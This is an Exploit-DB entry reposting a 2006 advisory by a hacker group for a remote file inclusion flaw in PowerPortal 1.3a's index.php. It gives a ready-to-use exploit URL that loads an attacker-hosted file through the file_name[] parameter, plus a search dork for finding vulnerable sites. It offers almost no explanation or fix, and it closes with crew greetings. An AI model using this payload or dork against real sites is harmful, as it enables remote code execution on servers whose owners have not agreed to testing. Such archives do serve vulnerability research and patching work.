PowerPortal 1.3a - 'index.php' Remote File Inclusion

EDB-ID:

2454

CVE:

2006-5126

EDB Verified:

Author:

v1per-haCker

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2006-09-29

Vulnerable App:

#==============================================================================================
# PowerPortal Remote File Include
#===============================================================================================
#
#Critical Level : Dangerous
#
# scripts: PowerPortal
# download: http://www.scripts.com/jump.php?ID=13698
#Version : v1.3a
#dork : Powered by PowerPortal v1.3a
# note not tested on other version :)
#================================================================================================
#Bug in :
#/index.php
#
#================================================================================================
#Vuln Code :
# think :)
#================================================================================================
#
#Exploit :
#
#http://localhost/path_to_PowerPortal/index.php?file_name[]=http://eivlCode.txt?
#
#
#================================================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad ; RooT-shilL ; hetler_jeddah ; BooB11 ; FaTaL ; 
ThE-WoLf-KsA ; mohandko ; fooooz ; maVen
#thanx to str0ke :)
#and all members in XP10_hackEr Team
#WWW.XP10.COM
==================================================================================================

# milw0rm.com [2006-09-29]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services